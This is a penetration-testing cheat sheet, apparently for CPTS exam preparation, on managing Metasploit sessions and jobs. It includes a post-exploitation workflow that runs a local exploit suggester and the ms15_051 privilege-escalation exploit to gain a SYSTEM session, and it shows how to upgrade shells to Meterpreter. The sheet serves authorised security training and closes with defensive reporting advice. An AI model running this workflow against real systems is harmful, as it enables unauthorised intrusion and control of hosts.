🛡️ Methodology Checklist
- List active sessions:
sessions -l - Interact with session:
sessions -i [ID] - Background current session: Ctrl+Z or
background - Kill a session:
sessions -k [ID] - List background jobs:
jobs - Kill a job:
jobs -k [ID] - Upgrade shell to Meterpreter:
sessions -u [ID] - Run command across all sessions:
sessions -C [CMD]
🎯 Operational Context
Use when: Managing multiple sessions and background jobs in MSF — multi-target engagements require clean session organization.
Think Dumber First: sessions -l before touching anything. Know what sessions you have and which host they’re on. Use -i [ID] to interact; background (Ctrl+Z) to push back. Never kill a session without noting the target — you may not get it back.
Skip when: Single-target lab — session management overhead not needed.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sessions | List all active sessions |
sessions -l | List sessions (explicit flag) |
sessions -i [ID] | Interact with a specific session |
background | Background active Meterpreter session |
[Ctrl+Z] | Background current session (keyboard shortcut) |
exploit -j | Run exploit as background job (non-blocking) |
jobs -l | List all running jobs |
jobs -k [ID] | Kill a specific job |
jobs -K | Kill ALL running jobs |
jobs -h | Job management help |
use post/multi/recon/local_exploit_suggester | Load local privesc suggester module |
set SESSION [ID] | Assign post module to a backgrounded session |
use post/multi/manage/shell_to_meterpreter | Upgrade dumb shell to Meterpreter |
🔬 Deep Dive & Workflow
Sessions — Persistent Connections
A session is a managed channel between msfconsole and a compromised target. Sessions persist independently of what module you’re running, so you can:
- Background one session → run a scanner on a new target → come back
- Chain multiple sessions (initial shell → post-module → SYSTEM session)
Jobs — Background Tasks
Jobs are MSF-level background tasks, typically listeners. Unlike sessions (which are connections), jobs are processes waiting for a connection.
| Session | Job | |
|---|---|---|
| What it is | Active shell/Meterpreter | Waiting listener or task |
| Created by | Exploit success | exploit -j or handler |
| Killed by | sessions -k [ID] | jobs -k [ID] |
| Port binding | No | Yes — holds the port |
Post-Exploitation Workflow with Sessions
# 1. Get initial shell (Session 1 created)
exploit
# 2. Background it
background (or Ctrl+Z)
# 3. Load post module
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
# 4. Use a suggested exploit, link to same session
use exploit/windows/local/ms15_051_client_copy_image
set SESSION 1
set LHOST tun0
run
# New Session 2 opens as SYSTEMCommon Issues & Fixes
“Exploit completed, but no session was created”
Don’t panic. Check jobs -l — the listener might still be running waiting for the callback. Try browsing to the URL or triggering the payload again.
“Address already in use” on listener port Old job is holding the port:
jobs -l # find the job ID
jobs -k [ID] # kill itOr use jobs -K to clear all jobs at once.
Upgrading a Dumb Shell to Meterpreter
background
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run
sessions -i 2 # interact with new Meterpreter sessionCPTS Exam Checklist
- Always use
tun0for LHOST, not LAN IP - Check
jobs -lbefore “exploit has no session” panic - Use
jobs -Kwhen switching exploits to avoid port conflicts - Background sessions with
Ctrl+Z— don’texit(that kills the shell)
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Session closed unexpectedly | Network timeout or AV killed process | Check sessions -l — dead sessions show as ‘Closed’; re-exploit if needed |
| Background job consuming too much CPU | Scanner or brute-force job | jobs -l to list; jobs -k [ID] to kill runaway jobs |
| sessions -i opens wrong session | Tab-complete or wrong ID | Verify: sessions -l shows Host column — match IP to intended target |
| Session upgrade to Meterpreter fails | Shell session on wrong arch | Use post/multi/manage/shell_to_meterpreter and verify LHOST/LPORT are accessible |
| Multiple sessions from same host | Payload ran multiple times | sessions -k [ID] to kill duplicates; keep only one stable session per host |
📝 Reporting Trigger
Finding Title: Multiple Simultaneous Meterpreter Sessions Across Compromised Hosts Impact: Concurrent Meterpreter sessions across multiple hosts indicate wide-scale compromise with persistent access to multiple network segments, enabling coordinated lateral movement and data exfiltration. Root Cause: Vulnerable services across multiple hosts exploited in sequence using MSF multi-handler. No session anomaly detection. Recommendation: Implement network monitoring to detect multiple simultaneous outbound connections to external IPs. Alert on new outbound connections from server workloads. Isolate and re-image all compromised hosts.